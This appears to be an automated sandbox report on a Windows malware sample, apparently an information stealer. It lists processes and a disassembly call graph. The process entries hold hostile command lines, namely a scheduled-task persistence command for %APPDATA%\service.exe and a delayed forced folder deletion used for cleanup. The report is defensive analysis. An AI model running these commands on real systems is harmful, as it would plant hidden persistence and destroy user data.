• Detection: 54%, ReversingLabs
Has exited:false

Target ID:55
Start time:09:27:06
Start date:14/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:09:27:06
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:09:27:06
Start date:14/11/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
Imagebase:0x60000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:09:27:07
Start date:14/11/2024
Path:C:\Users\user\AppData\Roaming\service.exe
Wow64 process (32bit):true
Commandline:C:\Users\user\AppData\Roaming\service.exe
Imagebase:0x400000
File size:5'842'928 bytes
MD5 hash:18F4B337AD6BEB8E7EE040BCC8C049DF
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 54%, ReversingLabs
Has exited:false

Target ID:59
Start time:09:27:08
Start date:14/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:09:27:08
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:09:27:08
Start date:14/11/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
Imagebase:0x60000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:62
Start time:09:27:10
Start date:14/11/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCGHJEBGHJKE" & exit
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:63
Start time:09:27:10
Start date:14/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:64
Start time:09:27:10
Start date:14/11/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout /t 10
Imagebase:0x2f0000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Memory Dump Source
• Source File: 00000000.00000003.2193590871.0000000012E9A000.00000004.00001000.00020000.00000000.sdmp, Offset: 12E9A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_12e9a000_S0FTWARE.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d3911e8f8f61b251f8453e579cb84c6425213b697149eeba1cfafce01e098e87
• Instruction ID: 5c9a77d3fa91d8726dffc5cf82bab680aed52b4f72e366a2feaba9a76c2a0bb0
• Opcode Fuzzy Hash: d3911e8f8f61b251f8453e579cb84c6425213b697149eeba1cfafce01e098e87
• Instruction Fuzzy Hash: 9E32846244E3C24FD7538BB48CA56913FB0AE17224B5E45EBC4C1CF0A3E25D599ACB23
Memory Dump Source
• Source File: 00000000.00000003.2193590871.0000000012E9A000.00000004.00001000.00020000.00000000.sdmp, Offset: 12E9A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_3_12e9a000_S0FTWARE.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40e83ebd256b1cf773ab16c6bbc0d11b692495a3d19b7e01b55262bc0a3e11b8
• Instruction ID: 4aeef7993aea7b0d10df227e75c61c0c597104a0194ae133a991a554b6c23166
• Opcode Fuzzy Hash: 40e83ebd256b1cf773ab16c6bbc0d11b692495a3d19b7e01b55262bc0a3e11b8
• Instruction Fuzzy Hash: 8651E86A44E3C24FCB434B7848B5191BFB05E1B22435E89DBC5C1CE0B3E15D299AD723

Execution Graph

Execution Coverage:6.1%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:2.8%
Total number of Nodes:2000
Total number of Limit Nodes:14
2a0470c 3 API calls 68927->68928 68929 2a03a4a 68928->68929 68930 2a0470c 3 API calls 68929->68930 68931 2a03a60 68930->68931 68932 2a0470c 3 API calls 68931->68932 68933 2a03a79 68932->68933 68934 2a0470c 3 API calls 68933->68934 68935 2a03a8f 68934->68935 68936 2a0470c 3 API calls 68935->68936 68937 2a03aa5 68936->68937 68938 2a0470c 3 API calls 68937->68938 68939 2a03abb 68938->68939 68940 2a0470c 3 API calls 68939->68940 68941 2a03ad1 68940->68941 68942 2a0470c 3 API calls 68941->68942 68943 2a03ae7 68942->68943 68944 2a0470c 3 API calls 68943->68944 68945 2a03b00 68944->68945 68946 2a0470c 3 API calls 68945->68946 68947 2a03b16 68946->68947 68948 2a0470c 3 API calls 68947->68948 68949 2a03b2c 68948->68949 68950 2a0470c 3 API calls 68949->68950 68951 2a03b42 68950->68951 68952 2a0470c 3 API calls 68951->68952 68953 2a03b57 68952->68953 68954 2a0470c 3 API calls 68953->68954 68955 2a03b6d 68954->68955 68956 2a0470c 3 API calls 68955->68956 68957 2a03b86 68956->68957 68958 2a0470c 3 API calls 68957->68958 68959 2a03b9c 68958->68959 68960 2a0470c 3 API calls 68959->68960 68961 2a03bb2 68960->68961 68962 2a0470c 3 API calls 68961->68962 68963 2a03bc8 68962->68963 68964 2a0470c 3 API calls 68963->68964 68965 2a03bde 68964->68965 68966 2a0470c 3 API calls 68965->68966 68967 2a03bf4 68966->68967 68968 2a0470c 3 API calls 68967->68968 68969 2a03c0d 68968->68969 68970 2a0470c 3 API calls 68969->68970 68971 2a03c23 68970->68971 68972 2a0470c 3 API calls 68971->68972 68973 2a03c39 68972->68973 68974 2a0470c 3 API calls 68973->68974 68975 2a03c4f 68974->68975 68976 2a0470c 3 API calls 68975->68976 68977 2a03c64 68976->68977 68978 2a0470c 3 API calls 68977->68978 68979 2a03c7a 68978->68979 68980 2a0470c 3 API calls 68979->68980 68981 2a03c92 68980->68981 68982 2a0470c 3 API calls 68981->68982 68983 2a03ca8 68982->68983 68984 2a0470c 3 API calls 68983->68984 68985 2a03cbe 68984->68985 68986 2a0470c 3 API calls 68985->68986 68987 2a03cd4 68986->68987 68988 2a0470c 3 API calls 
68987->68988 68989 2a03cea 68988->68989 68990 2a0470c 3 API calls 68989->68990 68991 2a03d00 68990->68991 68992 2a0470c 3 API calls 68991->68992 68993 2a03d19 68992->68993 68994 2a0470c 3 API calls 68993->68994 68995 2a03d2f 68994->68995 68996 2a0470c 3 API calls 68995->68996 68997 2a03d45 68996->68997 68998 2a0470c 3 API calls 68997->68998 68999 2a03d5b 68998->68999 69000 2a0470c 3 API calls 68999->69000 69001 2a03d71 69000->69001 69002 2a0470c 3 API calls 69001->69002 69003 2a03d87 69002->69003 69004 2a0470c 3 API calls 69003->69004 69005 2a03da0 69004->69005 69006 2a0470c 3 API calls 69005->69006 69007 2a03db6 69006->69007 69008 2a0470c 3 API calls 69007->69008 69009 2a03dcc 69008->69009 69010 2a0470c 3 API calls 69009->69010 69011 2a03de1 69010->69011 69012 2a0470c 3 API calls 69011->69012 69013 2a03df7 69012->69013 69014 2a0470c 3 API calls 69013->69014 69015 2a03e0d 69014->69015 69016 2a0470c 3 API calls 69015->69016 69017 2a03e26 69016->69017 69018 2a0470c 3 API calls 69017->69018 69019 2a03e3c 69018->69019 69020 2a0470c 3 API calls 69019->69020 69021 2a03e52 69020->69021 69022 2a0470c 3 API calls 69021->69022 69023 2a03e67 69022->69023 69024 2a0470c 3 API calls 69023->69024 69025 2a03e7d 69024->69025 69026 2a0470c 3 API calls 69025->69026 69027 2a03e93 69026->69027 69028 2a0470c 3 API calls 69027->69028 69029 2a03eac 69028->69029 69030 2a0470c 3 API calls 69029->69030 69031 2a03ec2 69030->69031 69032 2a0470c 3 API calls 69031->69032 69033 2a03ed8 69032->69033 69034 2a0470c 3 API calls 69033->69034 69035 2a03eee 69034->69035 69036 2a0470c 3 API calls 69035->69036 69037 2a03f04 69036->69037 69038 2a0470c 3 API calls 69037->69038 69039 2a03f19 69038->69039 69040 2a0470c 3 API calls 69039->69040 69041 2a03f32 69040->69041 69042 2a0470c 3 API calls 69041->69042 69043 2a03f48 69042->69043 69044 2a0470c 3 API calls 69043->69044 69045 2a03f5e 69044->69045 69046 2a0470c 3 API calls 69045->69046 69047 2a03f74 69046->69047 69048 2a0470c 3 API calls 69047->69048 69049 
2a03f8a 69048->69049 69050 2a0470c 3 API calls 69049->69050 69051 2a03fa0 69050->69051 69052 2a0470c 3 API calls 69051->69052 69053 2a03fb8 69052->69053 69054 2a0470c 3 API calls 69053->69054 69055 2a03fce 69054->69055 69056 2a0470c 3 API calls 69055->69056 69057 2a03fe3 69056->69057 69058 2a0470c 3 API calls 69057->69058 69059 2a03ff8 69058->69059 69060 2a0470c 3 API calls 69059->69060 69061 2a0400e 69060->69061 69062 2a0470c 3 API calls 69061->69062 69063 2a04023 69062->69063 69064 2a0470c 3 API calls 69063->69064 69065 2a0403c 69064->69065 69066 2a0470c 3 API calls 69065->69066 69067 2a04052 69066->69067 69068 2a0470c 3 API calls 69067->69068 69069 2a04068 69068->69069 69070 2a0470c 3 API calls 69069->69070 69071 2a0407e 69070->69071 69072 2a0470c 3 API calls 69071->69072 69073 2a04094 69072->69073 69074 2a0470c 3 API calls 69073->69074 69075 2a040aa 69074->69075 69076 2a0470c 3 API calls 69075->69076 69077 2a040c2 69076->69077 69078 2a0470c 3 API calls 69077->69078 69079 2a040d7 69078->69079 69080 2a0470c 3 API calls 69079->69080 69081 2a040ec 69080->69081 69082 2a0470c 3 API calls 69081->69082 69083 2a04102 69082->69083 69084 2a0470c 3 API calls 69083->69084 69085 2a04118 69084->69085 69086 2a0470c 3 API calls 69085->69086 69087 2a0412d 69086->69087 69088 2a0470c 3 API calls 69087->69088 69089 2a04146 69088->69089 69090 2a0470c 3 API calls 69089->69090 69091 2a0415c 69090->69091 69092 2a0470c 3 API calls 69091->69092 69093 2a04171 69092->69093 69094 2a0470c 3 API calls 69093->69094 69095 2a04187 69094->69095 69096 2a0470c 3 API calls 69095->69096 69097 2a0419d 69096->69097 69098 2a0470c 3 API calls 69097->69098 69099 2a041b2 69098->69099 69100 2a0470c 3 API calls 69099->69100 69101 2a041cb 69100->69101 69102 2a0470c 3 API calls 69101->69102 69103 2a041e1 69102->69103 69104 2a0470c 3 API calls 69103->69104 69105 2a041f7 69104->69105 69106 2a0470c 3 API calls 69105->69106 69107 2a0420c 69106->69107 69108 2a0470c 3 API calls 69107->69108 69109 2a04222 
69108->69109 69110 2a0470c 3 API calls 69109->69110 69111 2a04238 69110->69111 69112 2a0470c 3 API calls 69111->69112 69113 2a04251 69112->69113 69114 2a0470c 3 API calls 69113->69114 69115 2a04267 69114->69115 69116 2a0470c 3 API calls 69115->69116 69117 2a0427d 69116->69117 69118 2a0470c 3 API calls 69117->69118 69119 2a04292 69118->69119 69120 2a0470c 3 API calls 69119->69120 69121 2a042a8 69120->69121 69122 2a0470c 3 API calls 69121->69122 69123 2a042be 69122->69123 69124 2a0470c 3 API calls 69123->69124 69125 2a042d7 69124->69125 69126 2a0470c 3 API calls 69125->69126 69127 2a042ec 69126->69127 69128 2a0470c 3 API calls 69127->69128 69129 2a04302 69128->69129 69130 2a0470c 3 API calls 69129->69130 69131 2a04318 69130->69131 69132 2a0470c 3 API calls 69131->69132 69133 2a0432e 69132->69133 69134 2a0470c 3 API calls 69133->69134 69135 2a04344 69134->69135 69136 2a0470c 3 API calls 69135->69136 69137 2a0435d 69136->69137 69138 2a0470c 3 API calls 69137->69138 69139 2a04373 69138->69139 69140 2a0470c 3 API calls 69139->69140 69141 2a04388 69140->69141 69142 2a0470c 3 API calls 69141->69142 69143 2a0439d 69142->69143 69144 2a0470c 3 API calls 69143->69144 69145 2a043b2 69144->69145 69146 2a0470c 3 API calls 69145->69146 69147 2a043c7 69146->69147 69148 2a0470c 3 API calls 69147->69148 69149 2a043e0 69148->69149 69150 2a0470c 3 API calls 69149->69150 69151 2a043f6 69150->69151 69152 2a0470c 3 API calls 69151->69152 69153 2a0440b 69152->69153 69154 2a0470c 3 API calls 69153->69154 69155 2a04421 69154->69155 69156 2a0470c 3 API calls 69155->69156 69157 2a04436 69156->69157 69158 2a0470c 3 API calls 69157->69158 69159 2a0444c 69158->69159 69160 2a0470c 3 API calls 69159->69160 69161 2a04465 69160->69161 69162 2a0470c 3 API calls 69161->69162 69163 2a0447a 69162->69163 69164 2a0470c 3 API calls 69163->69164 69165 2a0448f 69164->69165 69166 2a0470c 3 API calls 69165->69166 69167 2a044a5 69166->69167 69168 2a0470c 3 API calls 69167->69168 69169 2a044bb 69168->69169 69170 
2a0470c 3 API calls 69169->69170 69171 2a044d1 69170->69171 69172 2a0470c 3 API calls 69171->69172 69173 2a044ea 69172->69173 69174 2a0470c 3 API calls 69173->69174 69175 2a04500 69174->69175 69176 2a0470c 3 API calls 69175->69176 69177 2a04516 69176->69177 69178 2a0470c 3 API calls 69177->69178 69179 2a0452c 69178->69179 69180 2a0470c 3 API calls 69179->69180 69181 2a04541 69180->69181 69182 2a0470c 3 API calls 69181->69182 69183 2a04556 69182->69183 69184 2a0470c 3 API calls 69183->69184 69185 2a04571 69184->69185 69186 2a0470c 3 API calls 69185->69186 69187 2a04586 69186->69187 69188 2a0470c 3 API calls 69187->69188 69189 2a0459c 69188->69189 69190 2a0470c 3 API calls 69189->69190 69191 2a045b2 69190->69191 69192 2a0470c 3 API calls 69191->69192 69193 2a045c8 69192->69193 69194 2a0470c 3 API calls 69193->69194 69195 2a045de 69194->69195 69196 2a0470c 3 API calls 69195->69196 69197 2a045f7 69196->69197 69198 2a0470c 3 API calls 69197->69198 69199 2a0460d 69198->69199 69200 2a0470c 3 API calls 69199->69200 69201 2a04622 69200->69201 69202 2a0470c 3 API calls 69201->69202 69203 2a04637 69202->69203 69204 2a0470c 3 API calls 69203->69204 69205 2a0464d 69204->69205 69206 2a0470c 3 API calls 69205->69206 69207 2a04662 69206->69207 69208 2a0470c 3 API calls 69207->69208 69209 2a0467b 69208->69209 69210 2a0470c 3 API calls 69209->69210 69211 2a04691 69210->69211 69212 2a0470c 3 API calls 69211->69212 69213 2a046a6 69212->69213 69214 2a0470c 3 API calls 69213->69214 69215 2a046bb 69214->69215 69216 2a0470c 3 API calls 69215->69216 69217 2a046d1 69216->69217 69218 2a0470c 3 API calls 69217->69218 69219 2a046e7 69218->69219 69220 2a0470c 3 API calls 69219->69220 69221 2a04700 69220->69221 69221->68424 69223 2a12143 lstrcpy 69222->69223 69224 2a138c3 69223->69224 69225 2a12143 lstrcpy 69224->69225 69226 2a138d1 GetSystemTime 69225->69226 69227 2a138ed 69226->69227 69228 2a1e88c DName::DName 5 API calls 69227->69228 69229 2a13924 69228->69229 69229->68428 69232 2a1223d 
69230->69232 69231 2a12261 69231->68436 69232->69231 69233 2a1224f lstrcpy lstrcat 69232->69233 69233->69231 69235 2a12175 lstrcpy 69234->69235 69236 2a01cf7 69235->69236 69237 2a12175 lstrcpy 69236->69237 69238 2a01d02 69237->69238 69239 2a12175 lstrcpy 69238->69239 69240 2a01d0d 69239->69240 69241 2a12175 lstrcpy 69240->69241 69242 2a01d24 69241->69242 69243 2a18705 69242->69243 69244 2a121a5 2 API calls 69243->69244 69245 2a1873b 69244->69245 69246 2a121a5 2 API calls 69245->69246 69247 2a18748 69246->69247 69248 2a121a5 2 API calls 69247->69248 69249 2a18755 69248->69249 69250 2a12143 lstrcpy 69249->69250 69251 2a18762 69250->69251 69252 2a12143 lstrcpy 69251->69252 69253 2a1876f 69252->69253 69254 2a12143 lstrcpy 69253->69254 69255 2a1877c 69254->69255 69256 2a12143 lstrcpy 69255->69256 69257 2a18789 69256->69257 69258 2a12143 lstrcpy 69257->69258 69259 2a18796 69258->69259 69260 2a12143 lstrcpy 69259->69260 69316 2a187a3 69260->69316 69263 2a187e7 StrCmpCA 69264 2a18840 StrCmpCA 69263->69264 69263->69316 69265 2a18a23 69264->69265 69264->69316 69268 2a121e9 lstrcpy 69265->69268 69269 2a18a2e 69268->69269 69271 2a12143 lstrcpy 69269->69271 69272 2a18a3b 69271->69272 69274 2a121e9 lstrcpy 69272->69274 69273 2a01ced lstrcpy 69273->69316 69277 2a1897b 69274->69277 69275 2a1858d 28 API calls 69275->69316 69276 2a18615 33 API calls 69276->69316 69278 2a12143 lstrcpy 69277->69278 69279 2a18a5a 69278->69279 69280 2a121e9 lstrcpy 69279->69280 69283 2a18a64 69280->69283 69281 2a188a0 StrCmpCA 69282 2a188f9 StrCmpCA 69281->69282 69281->69316 69285 2a189f2 69282->69285 69286 2a1890f StrCmpCA 69282->69286 70319 2a18af1 69283->70319 69287 2a121e9 lstrcpy 69285->69287 69288 2a189c1 69286->69288 69289 2a18925 StrCmpCA 69286->69289 69293 2a189fd 69287->69293 69291 2a121e9 lstrcpy 69288->69291 69294 2a18937 StrCmpCA 69289->69294 69295 2a1898d 69289->69295 69290 2a12175 lstrcpy 69290->69316 69298 2a189cc 69291->69298 69300 2a12143 lstrcpy 69293->69300 69296 2a18959 69294->69296 
69297 2a18949 Sleep 69294->69297 69299 2a121e9 lstrcpy 69295->69299 69302 2a121e9 lstrcpy 69296->69302 69297->69316 69303 2a12143 lstrcpy 69298->69303 69304 2a18998 69299->69304 69301 2a18a0a 69300->69301 69305 2a121e9 lstrcpy 69301->69305 69306 2a18964 69302->69306 69307 2a189d9 69303->69307 69308 2a12143 lstrcpy 69304->69308 69305->69277 69309 2a12143 lstrcpy 69306->69309 69310 2a121e9 lstrcpy 69307->69310 69311 2a189a5 69308->69311 69312 2a18971 69309->69312 69310->69277 69313 2a121e9 lstrcpy 69311->69313 69314 2a121e9 lstrcpy 69312->69314 69313->69277 69314->69277 69315 2a121e9 lstrcpy 69315->69316 69316->69263 69316->69264 69316->69273 69316->69275 69316->69276 69316->69281 69316->69282 69316->69290 69316->69315 70310 2a029e8 69316->70310 70313 2a029f9 69316->70313 70316 2a02a0a 69316->70316 70326 2a02a1b lstrcpy 69316->70326 70327 2a02a2c lstrcpy 69316->70327 70328 2a02a3d lstrcpy 69316->70328 69317 2a18a77 69317->68442 69319 2a121e9 lstrcpy 69318->69319 69320 2a19a32 69319->69320 69321 2a121e9 lstrcpy 69320->69321 69322 2a19a3d 69321->69322 69323 2a121e9 lstrcpy 69322->69323 69324 2a19a48 69323->69324 69324->68444 69326 2a12185 69325->69326 69327 2a1219a 69326->69327 69328 2a12192 lstrcpy 69326->69328 69327->68451 69328->69327 69330 2a12642 GetVolumeInformationA 69329->69330 69331 2a1263b 69329->69331 69332 2a126a9 69330->69332 69331->69330 69332->69332 69333 2a126be GetProcessHeap RtlAllocateHeap 69332->69333 69334 2a126d9 69333->69334 69335 2a126e8 wsprintfA lstrcat 69333->69335 69336 2a12143 lstrcpy 69334->69336 70329 2a132e0 GetCurrentHwProfileA 69335->70329 69339 2a126e1 69336->69339 69338 2a12723 lstrlen 70345 2a1421b lstrcpy malloc strncpy 69338->70345 69342 2a1e88c DName::DName 5 API calls 69339->69342 69341 2a12746 lstrcat 69344 2a1275d 69341->69344 69343 2a1278a 69342->69343 69343->68466 69345 2a12143 lstrcpy 69344->69345 69346 2a12774 69345->69346 69346->69339 69348 2a12175 lstrcpy 69347->69348 69349 2a04a81 69348->69349 70349 2a049de 69349->70349 
69351 2a04a8d 69352 2a12143 lstrcpy 69351->69352 69353 2a04aa9 69352->69353 69354 2a12143 lstrcpy 69353->69354 69355 2a04ab9 69354->69355 69356 2a12143 lstrcpy 69355->69356 69357 2a04ac9 69356->69357 69358 2a12143 lstrcpy 69357->69358 69359 2a04ad9 69358->69359 69360 2a12143 lstrcpy 69359->69360 69361 2a04ae9 InternetOpenA StrCmpCA 69360->69361 69362 2a04b1d 69361->69362 69363 2a050bc InternetCloseHandle 69362->69363 69364 2a138a6 7 API calls 69362->69364 69374 2a05109 69363->69374 69365 2a04b3d 69364->69365 69366 2a12223 2 API calls 69365->69366 69367 2a04b50 69366->69367 69368 2a121e9 lstrcpy 69367->69368 69369 2a04b5b 69368->69369 69370 2a12265 3 API calls 69369->69370 69371 2a04b87 69370->69371 69372 2a121e9 lstrcpy 69371->69372 69373 2a04b92 69372->69373 69376 2a12265 3 API calls 69373->69376 69375 2a1e88c DName::DName 5 API calls 69374->69375 69377 2a0515d 69375->69377 69378 2a04bb3 69376->69378 69480 2a156ff StrCmpCA 69377->69480 69379 2a121e9 lstrcpy 69378->69379 69380 2a04bbe 69379->69380 69381 2a12223 2 API calls 69380->69381 69382 2a04be0 69381->69382 69383 2a121e9 lstrcpy 69382->69383 69384 2a04beb 69383->69384 69385 2a12265 3 API calls 69384->69385 69386 2a04c0c 69385->69386 69387 2a121e9 lstrcpy 69386->69387 69388 2a04c17 69387->69388 69389 2a12265 3 API calls 69388->69389 69390 2a04c38 69389->69390 69391 2a121e9 lstrcpy 69390->69391 69392 2a04c43 69391->69392 69393 2a12265 3 API calls 69392->69393 69394 2a04c65 69393->69394 69395 2a12223 2 API calls 69394->69395 69396 2a04c70 69395->69396 69397 2a121e9 lstrcpy 69396->69397 69398 2a04c7b 69397->69398 69399 2a04c91 InternetConnectA 69398->69399 69399->69363 69400 2a04cbf HttpOpenRequestA 69399->69400 69401 2a050b0 InternetCloseHandle 69400->69401 69402 2a04cff 69400->69402 69401->69363 69403 2a04d23 69402->69403 69404 2a04d07 InternetSetOptionA 69402->69404 69405 2a12265 3 API calls 69403->69405 69404->69403 69406 2a04d39 69405->69406 69407 2a121e9 lstrcpy 69406->69407 69408 2a04d44 69407->69408 69409 
2a12223 2 API calls 69408->69409 69410 2a04d66 69409->69410 69411 2a121e9 lstrcpy 69410->69411 69412 2a04d71 69411->69412 69413 2a12265 3 API calls 69412->69413 69414 2a04d92 69413->69414 69415 2a121e9 lstrcpy 69414->69415 69416 2a04d9d 69415->69416 69417 2a12265 3 API calls 69416->69417 69418 2a04dbf 69417->69418 69419 2a121e9 lstrcpy 69418->69419 69420 2a04dca 69419->69420 69421 2a12265 3 API calls 69420->69421 69422 2a04deb 69421->69422 69423 2a121e9 lstrcpy 69422->69423 69424 2a04df6 69423->69424 69425 2a12265 3 API calls 69424->69425 69426 2a04e17 69425->69426 69427 2a121e9 lstrcpy 69426->69427 69428 2a04e22 69427->69428 69429 2a12223 2 API calls 69428->69429 69430 2a04e41 69429->69430 69431 2a121e9 lstrcpy 69430->69431 69432 2a04e4c 69431->69432 69433 2a12265 3 API calls 69432->69433 69434 2a04e6d 69433->69434 69435 2a121e9 lstrcpy 69434->69435 69436 2a04e78 69435->69436 69437 2a12265 3 API calls 69436->69437 69438 2a04e99 69437->69438 69439 2a121e9 lstrcpy 69438->69439 69440 2a04ea4 69439->69440 69441 2a12223 2 API calls 69440->69441 69442 2a04ec6 69441->69442 69443 2a121e9 lstrcpy 69442->69443 69444 2a04ed1 69443->69444 69445 2a12265 3 API calls 69444->69445 69446 2a04ef2 69445->69446 69447 2a121e9 lstrcpy 69446->69447 69448 2a04efd 69447->69448 69449 2a12265 3 API calls 69448->69449 69450 2a04f1f 69449->69450 69451 2a121e9 lstrcpy 69450->69451 69452 2a04f2a 69451->69452 69453 2a12265 3 API calls 69452->69453 69454 2a04f4b 69453->69454 69455 2a121e9 lstrcpy 69454->69455 69456 2a04f56 69455->69456 69457 2a12265 3 API calls 69456->69457 69458 2a04f77 69457->69458 69459 2a121e9 lstrcpy 69458->69459 69460 2a04f82 69459->69460 69461 2a12223 2 API calls 69460->69461 69462 2a04fa1 69461->69462 69463 2a121e9 lstrcpy 69462->69463 69464 2a04fac 69463->69464 69465 2a12143 lstrcpy 69464->69465 69466 2a04fc7 69465->69466 69467 2a12223 2 API calls 69466->69467 69468 2a04fde 69467->69468 69469 2a12223 2 API calls 69468->69469 69470 2a04fef 69469->69470 69471 2a121e9 
lstrcpy 69470->69471 69472 2a04ffa 69471->69472 69473 2a05010 lstrlen lstrlen HttpSendRequestA 69472->69473 69474 2a05084 InternetReadFile 69473->69474 69475 2a0509e InternetCloseHandle 69474->69475 69478 2a05044 69474->69478 69476 2a02910 69475->69476 69476->69401 69477 2a12265 3 API calls 69477->69478 69478->69474 69478->69475 69478->69477 69479 2a121e9 lstrcpy 69478->69479 69479->69478 69481 2a15725 strtok_s 69480->69481 69482 2a1571e ExitProcess 69480->69482 69483 2a15741 69481->69483 69485 2a15885 69481->69485 69484 2a15867 strtok_s 69483->69484 69486 2a157f1 StrCmpCA 69483->69486 69487 2a15831 StrCmpCA 69483->69487 69488 2a15853 StrCmpCA 69483->69488 69489 2a157b2 StrCmpCA 69483->69489 69490 2a15796 StrCmpCA 69483->69490 69491 2a15806 StrCmpCA 69483->69491 69492 2a1581b StrCmpCA 69483->69492 69493 2a1577a StrCmpCA 69483->69493 69494 2a157dc StrCmpCA 69483->69494 69495 2a1575e StrCmpCA 69483->69495 69496 2a121a5 2 API calls 69483->69496 69484->69483 69484->69485 69485->68471 69486->69483 69486->69484 69487->69484 69488->69484 69489->69483 69489->69484 69490->69483 69490->69484 69491->69483 69491->69484 69492->69484 69493->69483 69493->69484 69494->69483 69494->69484 69495->69483 69495->69484 69496->69483 69498 2a12175 lstrcpy 69497->69498 69499 2a05e8c 69498->69499 69500 2a049de 5 API calls 69499->69500 69501 2a05e98 69500->69501 69502 2a12143 lstrcpy 69501->69502 69503 2a05eb4 69502->69503 69504 2a12143 lstrcpy 69503->69504 69505 2a05ec4 69504->69505 69506 2a12143 lstrcpy 69505->69506 69507 2a05ed4 69506->69507 69508 2a12143 lstrcpy 69507->69508 69509 2a05ee4 69508->69509 69510 2a12143 lstrcpy 69509->69510 69511 2a05ef4 InternetOpenA StrCmpCA 69510->69511 69512 2a05f28 69511->69512 69513 2a0663e InternetCloseHandle 69512->69513 69514 2a138a6 7 API calls 69512->69514 70355 2a091ff 69513->70355 69516 2a05f48 69514->69516 69518 2a12223 2 API calls 69516->69518 69517 2a0665f 69520 2a121a5 2 API calls 69517->69520 69531 2a0668b 69517->69531 69519 2a05f5b 
69518->69519 69521 2a121e9 lstrcpy 69519->69521 69522 2a06671 69520->69522 69526 2a05f66 69521->69526 69523 2a12265 3 API calls 69522->69523 69524 2a06684 69523->69524 69525 2a121e9 lstrcpy 69524->69525 69525->69531 69527 2a12265 3 API calls 69526->69527 69528 2a05f92 69527->69528 69529 2a121e9 lstrcpy 69528->69529 69530 2a05f9d 69529->69530 69533 2a12265 3 API calls 69530->69533 69532 2a1e88c DName::DName 5 API calls 69531->69532 69534 2a06717 69532->69534 69535 2a05fbe 69533->69535 69665 2a1514a strtok_s 69534->69665 69536 2a121e9 lstrcpy 69535->69536 69537 2a05fc9 69536->69537 69538 2a12223 2 API calls 69537->69538 69539 2a05feb 69538->69539 69540 2a121e9 lstrcpy 69539->69540 69541 2a05ff6 69540->69541 69542 2a12265 3 API calls 69541->69542 69543 2a06017 69542->69543 69544 2a121e9 lstrcpy 69543->69544 69545 2a06022 69544->69545 69546 2a12265 3 API calls 69545->69546 69547 2a06043 69546->69547 69548 2a121e9 lstrcpy 69547->69548 69549 2a0604e 69548->69549 69550 2a12265 3 API calls 69549->69550 69551 2a06070 69550->69551 69552 2a12223 2 API calls 69551->69552 69553 2a0607b 69552->69553 69554 2a121e9 lstrcpy 69553->69554 69555 2a06086 69554->69555 69556 2a0609c InternetConnectA 69555->69556 69557 2a06638 69556->69557 69558 2a060ca HttpOpenRequestA 69556->69558 69557->69513 69559 2a0662c InternetCloseHandle 69558->69559 69560 2a0610e 69558->69560 69559->69557 69561 2a06132 69560->69561 69562 2a06116 InternetSetOptionA 69560->69562 69563 2a12265 3 API calls 69561->69563 69562->69561 69564 2a06148 69563->69564 69565 